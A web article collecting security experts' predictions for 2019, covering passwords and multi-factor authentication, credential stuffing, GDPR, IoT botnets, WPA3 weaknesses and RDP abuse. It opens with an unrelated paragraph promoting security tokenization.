Tokenizing your security not only opens up investment opportunities to smaller investors within the US, it also provides easier access to investors of all levels throughout the world. Buying foreign securities in the traditional manner is a complex process. If the securities are even available, they are often offered with layers of costs and obscurity wrapped around them. Through tokenization, your offering can be easily purchased by an investor in China or Belgium, increasing global demand and liquidity.

When we looked at security predictions atthis time last year some experts were predicting that we'd see attacks on cryptocurrencies and that we'd continue to see a rise in the scale and profile of attacks.

They've been proved right on both counts over the course of 2018, so what is next year going to have in store? We've canvassed the views of a number of industry figures to find out what they see as the key security issues for 2019.

The end of the password as a prime security measure is something people have talked about for a long time. But are we now reaching a tipping point? After a number of high profile breaches people are finally going to be fed up thinks Adam Kujawa of Malwarebytes Labs "I'm really hoping that we’ll start to see a bigger adoption by large organizations of multi-factor authentication, to make it so that whatever information is stolen it won’t really matter as it will be impossible to log in. Will we see the end of passwords in 2019? No. it's going to take years to roll out across the board, but I am excited to see what companies start doing to address the problem."

The fact that relying on passwords alone is inadvisable is echoed by Jarrod Overson, director of engineering at Shape Security , "Breach disclosures due to credential stuffing attacks have seen a sharp ramp up in 2018 with Macy's, Uber, Dunkin Donuts and HSBC all falling victim. I imagine this is going to be a trend that continues to increase in 2019 because of regulatory requirements, heightened sensitivity, and increasing attacker sophistication."

Ira Shamkova, SVP of product management at Intermedia expects biometric security to gain in importance, "With more and more personal and business information being stored in the cloud, internet speeds increasing and the ease of access to information always improving, devices are becoming of secondary importance. In the coming years, expect to see employees have the ability to sign onto any computer or communications device with a retinal or other biometrics scan to easily access their virtual desktop, load any tools (including collaboration tools), and quickly pull all of their documents. The device will simply be a window to access information, not it’s home."

2018 saw the introduction of GDPR in Europe and the trend towards more regulation is expected to continue. "The enforcement ramifications as a result of General Data Protection Regulation (GDPR) compliance are yet to be seen," says Rod Oancea, director, governance and compliance services at InterVision . "Many businesses are still attempting to cope with how to meet the regulation’s extensive reach and requirements. Expect some fairly large penalties and fines in 2019 to show up in national and international news headlines from GDPR; and while US regulation around privacy has lagged behind historically, high-profile incidents and the resulting public interest has brought the stigma of data breaches to the (very costly) forefront. In turn, anticipate increased focus on what could have been done to prevent breaches, scrutiny on the effectiveness of data protection and security, and a higher bar for compliance with an ever-evolving number of requirements. As the outright and pervasive costs of non-compliance and breaches continue to grow, many organizations will need to invest in their security and data privacy practices, especially proactively in solution design."

But the push to privacy and data protection may come at a price for innovation according to Chris Byers, CEO of Formstack , "Countries that continue to push data protection and privacy will lag behind countries with less structure and requirement. As countries continue to press forward with making privacy a high value they may not realize that they are giving up ground in innovation. Innovation thrives in countries that support it through legislation and laws that support a free economy with low barriers to entry. The deeper the investment in privacy and protection, the less we will see innovation thrive."

The rise in numbers of IoT devices presents risk too. Raj Samani, chief scientist and fellow at McAfee says, "When you bring connected devices into the home, you need to make sure you enjoy using it in a safe and risk-free way. While these threats can seem scary, people can do a number of things to easily protect their smartphones, and therefore their smart homes, from malware. There's mobile security that warns you about risky apps before you download or use them and it often comes down to simple things such as being savvy with your passwords. If you have the right security in place, there’s no reason to be scared of smartphones or smart homes."

"Hackers are exploiting the woefully inadequate security on smart home devices to build powerful botnets, capable of delivering devastating DDoS attacks. Again, this is something we’re only likely to see more of. As use of the Internet continues to balloon at an exponential rate, we will see both the number of attacks and the fallout caused by them grow in severity," says Sean McGrath, privacy expert and cybersecurity advocate at BestVPN.com .

Panda Lab s echoes this view in its annual report, "In 2019we are likely to see an increase in attacks not just on routers, but on IoT devices in general. Thereare two main reasons for this: one the one hand, these devices’ default security leaves muchto be desired, with default passwords or simply no passwords at all. On the other hand, thesedevices are more difficult to update, and many users don’t even know how to do so."

The Wi-Fi that connects these devices is expected to come under threat too. "While WPA3 has undergone significant improvements over WPA2, it still does not provide protection from threat categories that operate primarily at Layer 2 and include: rogue APs, rogue clients, evil twin APs, neighbour APs, ad-hoc networks and misconfigured Aps," says Corey Nachreiner, CTO at WatchGuard Technologies . "We think it is highly likely that we’ll see at least one of these threat categories used to compromise a WPA3 network and our money is on the Evil Twin AP."

ESET's Senior Security Researcher Stephen Cobb, "I predict that criminals will continue to expand their abuse of remote access functionality, often via Remote Desktop Protocol (RDP). When RDP is poorly installed on systems that can be reached directly via the internet it can be attacked to gain unauthorized access. At that point, criminals can employ native operating system tools to stealthily abuse these compromised machines -- a technique known as 'living off the land' -- for a variety of malicious purposes, based on their configuration and connectivity."